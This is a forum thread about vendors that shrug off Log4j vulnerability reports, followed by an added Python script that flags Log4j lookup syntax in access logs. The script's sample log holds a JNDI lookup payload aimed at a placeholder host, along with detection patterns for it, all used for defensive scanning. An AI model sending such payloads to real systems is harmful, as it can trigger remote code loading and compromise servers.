by I_Am_Nous 922 days ago
Apathy is definitely the issue. Sometimes you tell a vendor about an issue and they say their app doesn't use Log4J even though it's gobbling up the Log4J test script in the username field... they don't want to care, so you can't make them.

Maybe they only use the log4j test script ;)

Or maybe someone had to run some scanning tool which reported 'no vulnerabilities'.

Exploiting log4j requires logging to be influenced by user input. Even if an application includes a vulnerable log4j but doesn't bother to log anything there's zero risk. In that case apathy saved you ;)
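The point made in this comment, that a vulnerable log4j only matters where client-supplied text reaches a logger, is also what a defender's log check keys on. The script below is an added example, not code from the thread: it scans access-log lines (Combined Log Format is assumed) for Log4j lookup syntax in the fields an application typically logs straight from the client, using constructed sample lines.

```python
import re
from urllib.parse import unquote

# Combined Log Format is assumed for the samples; adapt the regex for other formats.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Fields whose content comes from the client and is commonly passed to a logger.
CLIENT_FIELDS = ("user", "request", "referer", "agent")
LOOKUP_RE = re.compile(r"\$\{.*?\}")          # Log4j ${...} lookup syntax
JNDI_RE = re.compile(r"jndi:", re.IGNORECASE)

# Constructed sample lines, not real traffic; host names are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - alice [10/Dec/2021:10:01:12 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - ${jndi:ldap://scanner.example/x} [10/Dec/2021:10:01:15 +0000] "POST /login HTTP/1.1" 401 0 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:16 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 77 "-" "curl/7.79"
10.0.0.5 - bob [10/Dec/2021:10:01:20 +0000] "GET /$%7Bprice%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

def scan_line(line: str):
    """Return a finding per client field of one log line that carries lookup syntax."""
    m = COMBINED_RE.match(line)
    if not m:
        return []
    findings = []
    for field in CLIENT_FIELDS:
        value = unquote(m.group(field))     # the app usually logs the URL-decoded value
        lookups = LOOKUP_RE.findall(value)
        if not lookups:
            continue
        if JNDI_RE.search(value) or any("${" in lk[2:] for lk in lookups):
            severity = "high"    # JNDI lookup, or nested lookups no real username carries
        else:
            severity = "medium"  # any lookup syntax from a client deserves a look
        findings.append({"field": field, "severity": severity, "value": value})
    return findings

def scan_log(text: str):
    """Scan a whole log, tagging each finding with its 1-based line number."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for finding in scan_line(line):
            finding["line"] = lineno
            results.append(finding)
    return results

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']:6} {f['field']}={f['value']!r}")
```

A hit in these fields shows that client input reached a logger; whether the host is actually exploitable still depends on the log4j-core version on its classpath.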

Knowing that a vendor you selected is mishandling your users' data and doesn’t care to secure their systems is unacceptable.

Time to find a new vendor, as your continued usage of their unsecured services is now a liability.

Welcome to the world of enterprise software, where you don't get to choose what software you use and your company doesn't care.

Luckily they aren't our vendor. But I agree completely.